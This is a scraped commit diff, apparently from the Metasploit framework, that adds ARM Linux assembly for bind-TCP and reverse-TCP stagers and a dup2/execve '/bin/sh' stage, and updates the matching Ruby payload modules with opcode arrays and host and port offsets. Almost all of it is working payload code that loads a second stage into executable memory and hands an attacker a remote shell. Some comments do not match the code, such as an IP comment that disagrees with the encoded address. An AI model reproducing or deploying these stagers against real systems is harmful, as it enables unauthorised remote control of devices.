dcbz
commit
8b8fb9f5ae
|
|
@ -0,0 +1,34 @@
|
|||
@@
|
||||
@
|
||||
@ Name: generic
|
||||
@ Qualities: -
|
||||
@ Authors: nemo <nemo [at] felinemenace.org>
|
||||
@ License: MSF_LICENSE
|
||||
@ Description:
|
||||
@
|
||||
@ dup2 / execve("/bin/sh") stage for Linux ARM LE architecture.
|
||||
@@
|
||||
|
||||
.text
|
||||
.globl _start
|
||||
_start:
|
||||
int dup2(int oldfd, int newfd);
|
||||
mov r7,#63 ; __NR_dup2
|
||||
mov r1,#3
|
||||
up:
|
||||
mov r0,r12 ; oldfd (descriptor stored in r12 by the stager)
|
||||
sub r1,#1 ; newfd
|
||||
swi 0
|
||||
cmp r1,#1
|
||||
bge up
|
||||
@ execve(const char *path, char *const argv[], char *const envp[]);
|
||||
mov r7,#11 ; __NR_execve
|
||||
add r0,pc,#24 ; *path
|
||||
sub sp,#24
|
||||
str r0,[sp,#-20]
|
||||
mov r2,#0
|
||||
str r2,[sp,#-16]
|
||||
add r1,sp,#-20 ; *argv[]
|
||||
mov r2,r1 ; *envp[]
|
||||
swi 0
|
||||
.string "/bin/sh"
|
||||
|
|
@ -0,0 +1,101 @@
|
|||
@@
|
||||
@
|
||||
@ Name: stager_sock_bind
|
||||
@ Qualities: -
|
||||
@ Authors: nemo <nemo [at] felinemenace.org>
|
||||
@ License: MSF_LICENSE
|
||||
@ Description:
|
||||
@
|
||||
@ Implementation of a Linux portbind TCP stager for ARM LE architecture.
|
||||
@
|
||||
@ Socket descriptor in r12.
|
||||
@
|
||||
@ Assemble with: as stager_sock_bind.s -o stager_sock_bind.o
|
||||
@ Link with: ld stager_sock_bind.o -o stager_sock_bind
|
||||
@
|
||||
@ Meta-Information:
|
||||
@
|
||||
@ meta-shortname=Linux Bind TCP Stager
|
||||
@ meta-description=Listen on a port for a connection and run a second stage
|
||||
@ meta-authors=nemo <nemo [at] felinemenace.org>
|
||||
@ meta-os=linux
|
||||
@ meta-arch=armle
|
||||
@ meta-category=stager
|
||||
@ meta-connection-type=bind
|
||||
@ meta-name=bind_tcp
|
||||
@@
|
||||
|
||||
.text
|
||||
.globl _start
|
||||
_start:
|
||||
@ int socket(int domain, int type, int protocol);
|
||||
ldr r7,=281 @ __NR_socket
|
||||
mov r0,#2 @ domain = AF_INET
|
||||
mov r1,#1 @ type = SOCK_STREAM
|
||||
mov r2,#6 @ protocol = IPPROTO_TCP
|
||||
swi 0
|
||||
@ int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
mov r12,r0 @ sockfd
|
||||
add r7,#1 @ __NR_bind
|
||||
add r1,pc,#176 @ *addr
|
||||
mov r2,#16 @ addrlen
|
||||
swi 0
|
||||
@ int listen(int sockfd, int backlog);
|
||||
add r7,#2 @ __NR_listen
|
||||
mov r0,r12 @ sockfd
|
||||
swi 0
|
||||
@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
|
||||
add r7,#1 @ __NR_accept
|
||||
mov r0,r12 @ sockfd
|
||||
sub r1,r1,r1 @ *addr = NULL
|
||||
mov r2,r1 @ *addrlen = NULL
|
||||
swi 0
|
||||
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
mov r12,r0 @ sockfd
|
||||
sub sp,#4
|
||||
add r7,#6 @ __NR_recv
|
||||
mov r1,sp @ *buf (on the stack)
|
||||
mov r2,#4 @ len
|
||||
mov r3,#0 @ flags
|
||||
swi 0
|
||||
@ round length
|
||||
ldr r1,[sp,#0]
|
||||
ldr r3,=0xfffff000
|
||||
and r1,r1,r3
|
||||
mov r2,#1
|
||||
lsl r2,#12
|
||||
@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
|
||||
add r1,r2 @ length
|
||||
mov r7, #192 @ __NR_mmap2
|
||||
ldr r0,=0xffffffff @ *addr = NULL
|
||||
mov r2,#7 @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
ldr r3,=0x1022 @ flags = MAP_ANON | MAP_PRIVATE
|
||||
mov r4,r0 @ fd
|
||||
mov r5,#0 @ pgoffset
|
||||
swi 0
|
||||
@ recv loop
|
||||
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
add r7,#99 @ __NR_recv
|
||||
mov r1,r0 @ *buf
|
||||
mov r0,r12 @ sockfd
|
||||
mov r3,#0 @ flags
|
||||
@ remove blocksize from total length
|
||||
loop:
|
||||
ldr r2,[sp,#0]
|
||||
sub r2,#1000
|
||||
str r2,[sp,#0]
|
||||
cmp r2, #0
|
||||
ble last
|
||||
mov r2,#1000 @ len
|
||||
swi 0
|
||||
b loop
|
||||
last:
|
||||
add r2,#1000 @ len
|
||||
swi 0
|
||||
@ branch to code
|
||||
mov pc,r1
|
||||
@ addr
|
||||
@ port: 4444 , sin_fam = 2
|
||||
.word 0x5c110002
|
||||
@ ip
|
||||
.word 0x00000000
|
||||
|
|
@ -0,0 +1,92 @@
|
|||
@@
|
||||
@
|
||||
@ Name: stager_sock_reverse
|
||||
@ Qualities: -
|
||||
@ Authors: nemo <nemo [at] felinemenace.org>
|
||||
@ License: MSF_LICENSE
|
||||
@ Description:
|
||||
@
|
||||
@ Implementation of a Linux reverse TCP stager for ARM LE architecture.
|
||||
@
|
||||
@ Socket descriptor in r12.
|
||||
@
|
||||
@ Assemble with: as stager_sock_reverse.s -o stager_sock_reverse.o
|
||||
@ Link with: ld stager_sock_reverse.o -o stager_sock_reverse
|
||||
@
|
||||
@ Meta-Information:
|
||||
@
|
||||
@ meta-shortname=Linux Reverse TCP Stager
|
||||
@ meta-description=Connect back to the framework and run a second stage
|
||||
@ meta-authors=nemo <nemo [at] felinemenace.org>
|
||||
@ meta-os=linux
|
||||
@ meta-arch=armle
|
||||
@ meta-category=stager
|
||||
@ meta-connection-type=reverse
|
||||
@ meta-name=reverse_tcp
|
||||
@@
|
||||
|
||||
.text
|
||||
.globl _start
|
||||
_start:
|
||||
@ int socket(int domain, int type, int protocol);
|
||||
ldr r7,=281 @ __NR_socket
|
||||
mov r0,#2 @ domain = AF_INET
|
||||
mov r1,#1 @ type = SOCK_STREAM
|
||||
mov r2,#6 @ protocol = IPPROTO_TCP
|
||||
swi 0
|
||||
@ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
mov r12,r0 @ sockfd
|
||||
add r7,#2 @ __NR_socket
|
||||
add r1,pc,#144 @ *addr
|
||||
mov r2,#16 @ addrlen
|
||||
swi 0
|
||||
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
mov r0,r12 @ sockfd
|
||||
sub sp,#4
|
||||
add r7,#8 @ __NR_recv
|
||||
mov r1,sp @ *buf (on the stack)
|
||||
mov r2,#4 @ len
|
||||
mov r3,#0 @ flags
|
||||
swi 0
|
||||
@ round length
|
||||
ldr r1,[sp,#0]
|
||||
ldr r3,=0xfffff000
|
||||
and r1,r1,r3
|
||||
mov r2,#1
|
||||
lsl r2,#12
|
||||
@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
|
||||
add r1,r2 @ length
|
||||
mov r7, #192 @ __NR_mmap2
|
||||
ldr r0,=0xffffffff @ *addr = NULL
|
||||
mov r2,#7 @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
ldr r3,=0x1022 @ flags = MAP_ANON | MAP_PRIVATE
|
||||
mov r4,r0 @ fd
|
||||
mov r5,#0 @ pgoffset
|
||||
swi 0
|
||||
@ recv loop
|
||||
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
add r7,#99 @ __NR_recv
|
||||
mov r1,r0 @ *buf
|
||||
mov r0,r12 @ sockfd
|
||||
mov r3,#0 @ flags
|
||||
@ remove blocksize from total length
|
||||
loop:
|
||||
ldr r2,[sp,#0]
|
||||
sub r2,#1000
|
||||
str r2,[sp,#0]
|
||||
cmp r2, #0
|
||||
ble last
|
||||
mov r2,#1000 @ len
|
||||
swi 0
|
||||
b loop
|
||||
last:
|
||||
add r2,#1000 @ len
|
||||
swi 0
|
||||
@ branch to code
|
||||
mov pc,r1
|
||||
@ addr
|
||||
@ port: 4444 , sin_fam = 2
|
||||
.word 0x5c110002
|
||||
@ ip: 127.0.0.1
|
||||
.word 0x01aca8c0
|
||||
@.word 0x0100007f
|
||||
|
|
@ -26,7 +26,7 @@ module Metasploit3
|
|||
super(merge_info(info,
|
||||
'Name' => 'Bind TCP Stager',
|
||||
'Description' => 'Listen for a connection',
|
||||
'Author' => 'nemo@felinemenace.org',
|
||||
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
|
|
@ -39,14 +39,14 @@ module Metasploit3
|
|||
},
|
||||
'Payload' =>
|
||||
[
|
||||
0xe59f70d4, # ldr r7, [pc, #212] ; 8130 <last+0x14>
|
||||
0xe59f70d4, # ldr r7, [pc, #212]
|
||||
0xe3a00002, # mov r0, #2
|
||||
0xe3a01001, # mov r1, #1
|
||||
0xe3a02006, # mov r2, #6
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0c000, # mov ip, r0
|
||||
0xe2877001, # add r7, r7, #1
|
||||
0xe28f10b0, # add r1, pc, #176 ; 0xb0
|
||||
0xe28f10b0, # add r1, pc, #176
|
||||
0xe3a02010, # mov r2, #16
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe2877002, # add r7, r7, #2
|
||||
|
|
@ -65,31 +65,31 @@ module Metasploit3
|
|||
0xe3a03000, # mov r3, #0
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe59d1000, # ldr r1, [sp]
|
||||
0xe59f3070, # ldr r3, [pc, #112] ; 8134 <last+0x18>
|
||||
0xe59f3070, # ldr r3, [pc, #112]
|
||||
0xe0011003, # and r1, r1, r3
|
||||
0xe3a02001, # mov r2, #1
|
||||
0xe1a02602, # lsl r2, r2, #12
|
||||
0xe0811002, # add r1, r1, r2
|
||||
0xe3a070c0, # mov r7, #192 ; 0xc0
|
||||
0xe3a070c0, # mov r7, #192
|
||||
0xe3e00000, # mvn r0, #0
|
||||
0xe3a02007, # mov r2, #7
|
||||
0xe59f3054, # ldr r3, [pc, #84] ; 8138 <last+0x1c>
|
||||
0xe59f3054, # ldr r3, [pc, #84]
|
||||
0xe1a04000, # mov r4, r0
|
||||
0xe3a05000, # mov r5, #0
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe2877063, # add r7, r7, #99 ; 0x63
|
||||
0xe2877063, # add r7, r7, #99
|
||||
0xe1a01000, # mov r1, r0
|
||||
0xe1a0000c, # mov r0, ip
|
||||
0xe3a03000, # mov r3, #0
|
||||
0xe59d2000, # ldr r2, [sp]
|
||||
0xe2422ffa, # sub r2, r2, #1000 ; 0x3e8
|
||||
0xe2422ffa, # sub r2, r2, #1000
|
||||
0xe58d2000, # str r2, [sp]
|
||||
0xe3520000, # cmp r2, #0
|
||||
0xda000002, # ble 811c <last>
|
||||
0xe3a02ffa, # mov r2, #1000 ; 0x3e8
|
||||
0xe3a02ffa, # mov r2, #1000
|
||||
0xef000000, # svc 0x00000000
|
||||
0xeafffff7, # b 80fc <loop>
|
||||
0xe2822ffa, # add r2, r2, #1000 ; 0x3e8
|
||||
0xe2822ffa, # add r2, r2, #1000
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0f001, # mov pc, r1
|
||||
0x5c110002, # .word 0x5c110002
|
||||
|
|
|
|||
|
|
@ -26,7 +26,7 @@ module Metasploit3
|
|||
super(merge_info(info,
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' => 'nemo',
|
||||
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
|
|
@ -35,19 +35,19 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 194, 'n' ],
|
||||
'LHOST' => [ 196, 'ADDR' ],
|
||||
'LPORT' => [ 182, 'n' ],
|
||||
'LHOST' => [ 184, 'ADDR' ],
|
||||
},
|
||||
'Payload' =>
|
||||
[
|
||||
0xe59f70b4, # ldr r7, [pc, #180] ; 8110 <last+0x14>
|
||||
0xe59f70b4, # ldr r7, [pc, #180]
|
||||
0xe3a00002, # mov r0, #2
|
||||
0xe3a01001, # mov r1, #1
|
||||
0xe3a02006, # mov r2, #6
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0c000, # mov ip, r0
|
||||
0xe2877002, # add r7, r7, #2
|
||||
0xe28f1090, # add r1, pc, #144 ; 0x90
|
||||
0xe28f1090, # add r1, pc, #144
|
||||
0xe3a02010, # mov r2, #16
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0000c, # mov r0, ip
|
||||
|
|
@ -58,31 +58,31 @@ module Metasploit3
|
|||
0xe3a03000, # mov r3, #0
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe59d1000, # ldr r1, [sp]
|
||||
0xe59f3070, # ldr r3, [pc, #112] ; 8114 <last+0x18>
|
||||
0xe59f3070, # ldr r3, [pc, #112]
|
||||
0xe0011003, # and r1, r1, r3
|
||||
0xe3a02001, # mov r2, #1
|
||||
0xe1a02602, # lsl r2, r2, #12
|
||||
0xe0811002, # add r1, r1, r2
|
||||
0xe3a070c0, # mov r7, #192 ; 0xc0
|
||||
0xe3a070c0, # mov r7, #192
|
||||
0xe3e00000, # mvn r0, #0
|
||||
0xe3a02007, # mov r2, #7
|
||||
0xe59f3054, # ldr r3, [pc, #84] ; 8118 <last+0x1c>
|
||||
0xe59f3054, # ldr r3, [pc, #84]
|
||||
0xe1a04000, # mov r4, r0
|
||||
0xe3a05000, # mov r5, #0
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe2877063, # add r7, r7, #99 ; 0x63
|
||||
0xe2877063, # add r7, r7, #99
|
||||
0xe1a01000, # mov r1, r0
|
||||
0xe1a0000c, # mov r0, ip
|
||||
0xe3a03000, # mov r3, #0
|
||||
0xe59d2000, # ldr r2, [sp]
|
||||
0xe2422ffa, # sub r2, r2, #1000 ; 0x3e8
|
||||
0xe2422ffa, # sub r2, r2, #1000
|
||||
0xe58d2000, # str r2, [sp]
|
||||
0xe3520000, # cmp r2, #0
|
||||
0xda000002, # ble 80fc <last>
|
||||
0xe3a02ffa, # mov r2, #1000 ; 0x3e8
|
||||
0xe3a02ffa, # mov r2, #1000
|
||||
0xef000000, # svc 0x00000000
|
||||
0xeafffff7, # b 80dc <loop>
|
||||
0xe2822ffa, # add r2, r2, #1000 ; 0x3e8
|
||||
0xe2822ffa, # add r2, r2, #1000
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0f001, # mov pc, r1
|
||||
0x5c110002, # .word 0x5c110002
|
||||
|
|
@ -96,7 +96,7 @@ module Metasploit3
|
|||
))
|
||||
end
|
||||
|
||||
def handle_i7 termediate_stage(conn, payload)
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
||||
print_status("Transmitting stage length value...(#{payload.length} bytes)")
|
||||
|
||||
|
|
|
|||
|
|
@ -17,7 +17,7 @@ module Metasploit3
|
|||
super(merge_info(info,
|
||||
'Name' => 'Linux dup2 Command Shell',
|
||||
'Description' => 'dup2 socket in r12, then execve',
|
||||
'Author' => 'nemo',
|
||||
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
|
|
|
|||
Loading…
Reference in New Issue